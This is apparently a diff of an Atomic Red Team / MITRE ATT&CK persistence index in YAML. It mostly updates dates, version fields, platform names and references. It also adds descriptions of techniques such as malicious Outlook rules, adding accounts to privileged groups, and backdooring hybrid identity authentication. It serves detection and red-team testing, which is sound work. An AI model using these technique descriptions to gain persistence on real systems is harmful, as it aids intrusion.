+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests:
     - name: Simulate Patching termsrv.dll
@@ -51020,7 +51386,7 @@ persistence:
         name: powershell
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -51112,8 +51478,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -51144,7 +51510,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests:
     - name: Chrome/Chromium (Developer Mode)
@@ -51258,66 +51623,135 @@ persistence:
         elevation_required: true
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -51348,7 +51782,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -51403,8 +51837,6 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests:
     - name: Application Shim Installation
@@ -51493,7 +51925,7 @@ persistence:
         elevation_required: true
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -51554,9 +51986,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -51565,7 +51997,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests:
     - name: Add Port Monitor persistence in Registry
@@ -51642,7 +52073,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -51663,12 +52094,11 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -51752,11 +52182,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -51769,7 +52198,6 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -51782,7 +52210,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -51812,7 +52239,8 @@ persistence:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests:
     - name: Shortcut Modification
@@ -51895,7 +52323,7 @@ persistence:
         url: https://github.com/RhinoSecurityLabs/ccat
         description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
           Retrieved September 12, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:27:49.094Z'
       name: Implant Internal Image
       description: |-
         Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -51917,8 +52345,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.005:
     technique:
@@ -51944,7 +52370,7 @@ persistence:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -51970,8 +52396,6 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests:
     - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -52015,30 +52439,30 @@ persistence:
         elevation_required: true
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -52046,9 +52470,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -52057,21 +52481,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -52111,13 +52536,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -52194,12 +52616,11 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -52218,6 +52639,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -52225,7 +52647,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -52245,29 +52666,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests:
     - name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -52360,7 +52783,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests:
     - name: Web Shell Written to Disk
@@ -52404,7 +52826,7 @@ persistence:
         name: command_prompt
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -52419,6 +52841,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -52427,18 +52850,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -52470,9 +52893,6 @@ persistence:
